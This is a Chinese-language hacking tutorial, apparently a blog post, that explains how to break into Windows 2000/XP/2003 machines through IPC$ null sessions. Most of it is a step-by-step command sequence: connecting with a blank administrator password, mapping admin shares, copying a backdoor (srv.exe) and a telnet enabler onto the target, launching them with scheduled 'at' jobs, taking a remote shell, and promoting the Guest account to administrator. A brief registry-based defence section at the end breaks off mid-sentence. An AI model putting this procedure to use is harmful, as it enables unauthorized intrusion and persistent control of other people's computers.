|
今天天气好,好想写了一篇文章。结果写了(好废啊~~555),因为自己是读紧网络专业的,不懂黑客技术是不行的,所以看过好多文章大部分都是从WINDOWS开始的初级入侵和防范,现在看多了技术也有些进步所以想写下以前自己做菜鸟黑客的心得和一写基本防范。好废话少讲,我们开始了。
首先,我们用的平台一般WIN2000或XP或2003,以下的系统估计很少,因为缺少多协议和漏洞所以没必要去攻击,我们以最多人用的WIN XP为例攻击WIN2000或WINXP或WIN2003的机子(应该服务器类WIN2000多)。
先来试试手吧``打开运行—CMD——,
1.建立空连接net use \\***.***.***.***\ipc$ "" user:""(*是IP,要注意这一行命令中包含了3个空格)。
2.建立非空连接net use \\***.***.***.***\ipc$ 用户名 user密码(在你知道对方机帐号密码时可用)。
3.映射默认共享(最重要,哈哈得到对方的盘你还想点做呢```)net use *:\\***.***.***.***\*$ 密码 user用户名 (前面第一个*是自己本地想映射的盘,后面的*是映射被攻击机的盘例如net use s: 192.168.1.1\\c$(映射对方C盘为自己的S盘)注意的是映射时必须与对方建立一个IPC$连接。
4.删除共享映射 net use c del 删除映射的c盘,net use del 删除全部,会有提示要求按y确认。
再来。我们用木马进行攻击
C:\>net use \\127.0.0.1\IPC$ "" /user:admintitrators (建立一个IPC连接)
我们流光这个好用的软件扫到的用户名是administrators,密码为"空"的IP地址,如果攻击的话,就可以用命令和127.0.0.1建立一个连接,因为密码为"空" 。
C:\>copy srv.exe \\127.0.0.1\admin$ (复制srv.exe上去,这个文件在流光的Tools目录里的)
C:\>net time \\127.0.0.1 (这个基本命令是查对方的的时间,后面会用到的。例如我们用这命令查到对方机是2005/11/1 下午 14:03)那么我们就:
C:\>at \\127.0.0.1 14:05 srv.exe (at其实就是我们日常的计划任务啦``哈哈`用at命令启动srv.exe吧``很多黑客软件都会有远程启动命令来做一般的攻击例如某某时间掸出别人机的光区`就是这命令`不过用手动比较威``嘻。这里设置的时间当然比主机时间快,不然你什么启动。)如果时间没搞好可以再下多次的,好了我们确定运行了对方里的SRV后--
建入C:\>telnet 127.0.0.1 99 (端口是99。Telnet默认是23端口,我们使用SRV与对方机子建立了一个99端口的CMD)所以我们Telnet上去,但是SRV是一次性,下次再来玩就要再来一次相当麻烦所以我们还要建立一个Telnet服务,这要用到ntlm了。重复上步操作复制ntlm.exe到对方机上:
C:\>copy ntlm.exe \\127.0.0.1\admin$ (ntlm.ex也是在流光的Tools里)直接在对方的CMD运行 C:\WINNT\system32>ntlm.exe(当出现DONE的时,说明已经启动正常,z再使用net start telnet来开启Telnet服务。 Telnet 127.0.0.1输入用户名与密码就进入对方机,你要知道得到对方的CMD你是等于得好对方的整台机。
最后我们将对方的Guest用户激活
C:\>net user guest /active:yes(默认是关的),
改guest密码C:\>net user guest 1234,将Guest变为Administrato权限C:\>net localgroup administrators guest /add,自己建立一用户也可以的C:\>net user ** *(*前*个是你的自己建的用户名,后*是密码,注意中间空格)。
最后最最后等我们来防范下,其实我们只要关了默认共享就没什么事的(漏洞攻击无效果哦~)
1、清除默认磁盘共享:修改注册表:HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters增加AutoShareServer子键(REG_DWORD),键值为0 (如果无可以自己加进去)
2、清除默认ADMIN$共享:修改注册表:HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters增加AutoSh [1] [2] [3] 下一页
|
